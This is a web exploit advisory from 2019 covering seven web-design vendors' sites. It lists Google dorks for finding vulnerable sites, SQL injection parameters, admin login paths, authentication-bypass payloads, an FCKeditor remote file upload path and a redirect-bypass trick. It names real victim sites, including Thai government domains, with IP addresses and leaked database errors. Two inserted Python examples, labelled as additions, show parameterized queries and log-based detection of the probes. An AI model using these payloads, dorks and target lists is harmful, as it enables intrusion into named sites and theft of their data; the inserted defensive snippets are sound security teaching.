
Vinayak * Royalways * Apurva Infosystems AxisCompuTech * Hands in Technology * Computerization Cell * TimesMedia Hosting * VivaDizayn * SQL Injection / Authentication Bypass / Remote File Upload

Author: KingSkrupellos , Published: 01-02-2019
####################################################################

# Exploit Title : Vinayak * Royalways * Apurva Infosystems AxisCompuTech
* Hands in Technology * Computerization Cell * TimesMedia Hosting * VivaDizayn *
SQL Injection / Authentication Bypass / Remote File Upload
------------------------------------------------------------------------------------------------
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/01/2019
# Vendor Homepages of Vulnerable Products :
1) vinayak.com
2) royalways.com
3) apurvainfosystems.com - axiscomputech.in
4) handsintechnology.com
5) wbprd.nic.in
6) timesmedia.co.th
7) vivadizayn.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-592 [ Authentication Bypass Issues ]

####################################################################

# There are 6 vendors whose products suffer from remote SQL Injection Vulnerabilities.
***************************************************************************

1) Designed by Vinayak SQL Injection Vulnerability

2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability

3) Designed by Apurva Infosystems SQL Injection Vulnerability

4) Powered By Hands in Technology India SQL Injection Vulnerability

5) Designed & Developed By Computerization Cell
National Informatics Centre India SQL Injection Vulnerability

6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities

7) Design - Technology VivaDizayn SQL Injection Vulnerability

####################################################################

# Google Dorks for the Different Vulnerable Products :
********************************************
1) intext:designed by Vinayak site:in

2) intext:Website Design By Royalways

3) intext:designed by : Apurva Infosystems
intext:by Axis Computech & Peripherals Pvt. Ltd.

4) intext:Powered By : Hands in Technology site:in

5) intext:Designed & Developed By Computerization Cell
intext:Designed and Developed by : National Informatics Centre

6) inurl:''/select_news.php?news_id='' site:go.th

7) intext:Design - Technology VivaDizayn

####################################################################

1) Designed by Vinayak SQL Injection Vulnerability
********************************************
# Google Dork:
**************
intext:designed by Vinayak site:in

# SQL Injection Exploit :
***********************
/campusupdate.php?id=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] gnct.co.in/campusupdate.php?id=78%27

Note => (50.28.79.232) => There are 369 domains hosted on this server.

Note => (173.236.156.143) => There are 46 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_connect(): Access denied for user 'gniot_cognew'@'localhost'
(using password: YES) in /home/gnctgro7916/gnct.co.in/campusupdate.php on line 42

####################################################################

2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
**************************************************************************
# Google Dork:
**************
intext:Website Design By Royalways

# SQL Injection Exploit :
***********************
/new_arrival.php?count=[SQL Injection]

# Admin Login Path :
*******************
/admin/

# Authentication Bypass Exploit :
*****************************
Admin username => '=''or'
Admin password => '=''or'

/admin/home.php
/admin/add_cat.php
/admin/view_cat.php
/admin/add_product.php
/admin/view_products.php
/admin/add_coupon.php
/admin/manage_coupons.php
/admin/orders_status.php?sort=New
/admin/orders_status.php?sort=Pending
/admin/orders_status.php?sort=Delivered
/admin/manage_shipping.php
/admin/manage_currency.php
/admin/view_all_users.php
/admin/chg_pwd.php

# Example Vulnerable Site :
*************************
[+] hnh.in/new_arrival.php?count=1%27

Note : (198.49.66.2) => There are 81 domains hosted on this server.

Note : (198.49.66.5) => 1 Domain.

# SQL Database Error :
**********************
Warning: mysql_num_rows() expects parameter 1 to be
resource, boolean given in /home/hnhin/public_html
/products_new_arrival.php on line 159

####################################################################

3) Designed by Apurva Infosystems SQL Injection Vulnerability
******************************************************
# Google Dork :
**************
intext:designed by : Apurva Infosystems
intext:by Axis Computech & Peripherals Pvt. Ltd.

# SQL Injection Exploit :
***********************
/index.php?id=[SQL Injection]

/laptops.php?id=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] lenovoretail.in/index.php?id=1%27

Note : (173.254.75.123) => There are 109 domains hosted on this server.

Note : (208.79.234.118) => There are 90 domains hosted on this server.

# SQL Database Error :
**********************
Warning: mysql_query(): Access denied for user
''@'localhost' (using password: NO) in /home
/lenovoretail/public_html/index.php on line 59

####################################################################

4) Powered By Hands in Technology SQL Injection Vulnerability
*******************************************************
# Google Dork:
**************
intext:Powered By : Hands in Technology site:in

# SQL Injection Exploit :
***********************
/our-campaigns.php?id=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] struggleforjustice.in/our-campaigns.php?id=93%27

Note : (108.167.158.159) => There are 58 domains hosted on this server.

Note : (166.62.27.182) => There are 1,024 domains hosted on this server.

# SQL Database Error :
**********************
Deprecated: mysql_query(): The mysql extension is deprecated
and will be removed in the future: use mysqli or PDO instead in /home4/x0v7q0n7
/public_html/struggleforjustice.in/our-campaigns.php on line 74

####################################################################

5) Designed & Developed By Computerization Cell
National Informatics Centre India SQL Injection Vulnerability
******************************************************
# Google Dork:
**************
intext:Designed & Developed By Computerization Cell
intext:Designed and Developed by : National Informatics Centre

# SQL Injection Exploit :
***********************
/monthlyreport/cfcpgmonthlyreport.php?district=[SQL Injection]

# Example Vulnerable Site :
*************************
[+] wbprdgpms.in/monthlyreport/cfcpgmonthlyreport.php?district=15%27

Note : (164.100.178.145) => 2 Domains.

Note : (202.61.117.157) => 1 Domain.

# SQL Database Error :
**********************
Warning: mysql_fetch_array(): supplied argument is not a valid
MySQL result resource in D:\xampp\htdocs\gpmsstatus
\monthlyReport\cfcpgmonthlyreport.php on line 287

####################################################################

6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities
****************************************************************
# Google Dork :
*****************
inurl:''/select_news.php?news_id='' site:go.th

# CopyRight © 2015 www.timesmedia.co.th All Rights Reserved

# Note : Thailand Government WebSites are vulnerable.

# Admin Control Panel Login Path :
*******************************

/login_form.php
/admin.php

# SQL Injection Exploits :
***********************

/contact.php?content_id=[SQL Injection]

/base.php?content_id=[SQL Injection]

/council.php?content_id=[SQL Injection]

/history.php?content_id=[SQL Injection]

/person.php?content_id=[SQL Injection]

/vision.php?content_id=[SQL Injection]

/memorable.php?content_id=[SQL Injection]

/travel.php?content_id=[SQL Injection]

/stucture.php?content_id=[SQL Injection]

/admin1.php?content_id=[SQL Injection]

/otop.php?content_id=[SQL Injection]

/news.php?id_type=[SQL Injection]

/select_news.php?news_id=[SQL Injection]

/policy.php?content_id=[SQL Injection]

/office.php?content_id=[SQL Injection]

/data.php?content_id=[SQL Injection]

/strategy_plan.php?content_id=[SQL Injection]

/activity/user_select_photo.php?news_id=[SQL Injection]

/vdo/user_select_youtube.php?yt_id=[SQL Injection]

Unauthorized Topic Add without Administrator Permission Exploit =>
***********************************************************

TARGET/webboard/new.php?category=webboard

TARGET/webboard/index.php?category=webboard

Note : Use Mozilla Firefox Open Link No Redirect
Extension to Bypass Admin Control Panel

Download and Install on your Browser =>

addons.mozilla.org/en-US/firefox/addon/noredirect/

addons.mozilla.org/en-US/firefox/addon/open-link-directly-no-redirect/

If that does not work, try one of the SQL authentication bypass payloads below =>
*******************************************************************

Admin Username : anything' OR 'x'='x

Admin Password : anything' OR 'x'='x
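
Why the login payload above is accepted by a query built with string concatenation and rejected once the values are bound as parameters. This is an added example, not code from the advisory or from any of the vendors; the table, account and function names are assumptions, and an in-memory SQLite database stands in for the MySQL back end.

```python
import sqlite3

def make_db():
    """Constructed sample data: one admin row in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    # Plaintext only to keep the example short; real code stores a password hash.
    db.execute("INSERT INTO admin VALUES ('siteadmin', 'S3cret-constructed')")
    return db

def login_concatenated(db, username, password):
    """Vulnerable pattern: user input is pasted into the SQL text."""
    sql = ("SELECT username FROM admin WHERE username='" + username +
           "' AND password='" + password + "'")
    # With the payload the WHERE clause ends in  OR 'x'='x'  and matches every row.
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM admin WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None

PAYLOAD = "anything' OR 'x'='x"  # the string quoted in the advisory

if __name__ == "__main__":
    db = make_db()
    for label, check in (("concatenated", login_concatenated),
                         ("parameterized", login_parameterized)):
        print(label, "accepts payload:", check(db, PAYLOAD, PAYLOAD))
        print(label, "accepts valid login:",
              check(db, "siteadmin", "S3cret-constructed"))
```

In PHP the equivalent fix is a prepared statement through mysqli or PDO, the two extensions the deprecation warning in section 4 already points to.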

Directory File Path : /fileupload/....

Directory File Path : /activity/images/....

Remote File Upload Exploit =>
****************************

TARGET/admin/FCKeditor/editor/filemanager/upload/test.html

/UserFiles/....

Note : Only Thailand Government WebSites [ go.th ] are vulnerable to this issue.

# Example Vulnerable Sites :
**************************

=> Vulnerable IP Address => 61.19.250.25 =>

There are 52 domains hosted on this server.

Vendor Homepage Admin Panel => timesmedia.co.th/web58/admin/admin.php

[+] banthan.go.th/policy.php?content_id=1%27 =>

[ Proof of Concept for SQL Inj ] => archive.is/lkrrB

[+] makluakao.go.th/webboard/index.php?category=webboard =>

[ Proof of Concept ] => archive.is/azGk4

[+] phoklang.go.th/news.php?id_type=4%27 =>

[ Proof of Concept for RFU Vuln ] => archive.is/8wk57

# SQL Database Error :
*********************

Warning: mysql_fetch_array() expects parameter 1 to be
resource, boolean given in /home/phoklang/
domains/phoklang.go.th/public_html/news.php on line 129

####################################################################

7) Design - Technology VivaDizayn SQL Injection Vulnerability
*****************************************************
# Google Dork:
**************
intext:Design - Technology VivaDizayn

# SQL Injection Exploit :
**********************
/en/detay.php?id=[SQL Injection]

# Example Vulnerable Site :
************************
[+] rovelsan.com.tr/en/detay.php?id=696%27

Note : (185.67.122.66) => There are 210 domains hosted on this server.

# SQL Database Error :
*********************
Warning: mysql_fetch_array(): supplied argument is not a valid
MySQL result resource in /home/rovelsant/domains
/rovelsan.com.tr/public_html/en/detay.php on line 20
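
Every injectable parameter listed in this advisory carries a numeric identifier, and every probe shown appends %27 to it, so site operators can find such requests in their own access logs by flagging non-numeric values in those parameters. The following is an added example, not part of the original advisory; the log lines are constructed (documentation IP addresses, paths taken from the advisory) and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory lists as injectable; all are numeric identifiers.
NUMERIC_PARAMS = {"id", "count", "district", "content_id",
                  "news_id", "id_type", "yt_id"}

# Client address, request target and status from a combined-format log entry.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
DIGITS_RE = re.compile(r"[0-9]+")

def suspicious_requests(lines):
    """Return (client, path, param, value) for non-numeric values in numeric parameters."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target, _status = m.groups()
        url = urlsplit(target)
        # parse_qsl percent-decodes, so %27 is compared as a literal single quote.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key in NUMERIC_PARAMS and not DIGITS_RE.fullmatch(value):
                hits.append((client, url.path, key, value))
    return hits

# Constructed sample log lines.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jan/2019:10:00:01 +0000] "GET /campusupdate.php?id=78 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/Jan/2019:10:00:07 +0000] "GET /campusupdate.php?id=78%27 HTTP/1.1" 200 812',
    '192.0.2.44 - - [26/Jan/2019:10:00:09 +0000] "GET /new_arrival.php?count=1%27 HTTP/1.1" 200 640',
    '192.0.2.10 - - [26/Jan/2019:10:00:12 +0000] "GET /admin/orders_status.php?sort=New HTTP/1.1" 302 0',
    '192.0.2.44 - - [26/Jan/2019:10:00:15 +0000] "GET /news.php?id_type= HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The digits-only test is also the server-side input validation these pages lack, and the PHP warnings quoted throughout show display_errors enabled, which discloses full filesystem paths and should be off in production.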

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
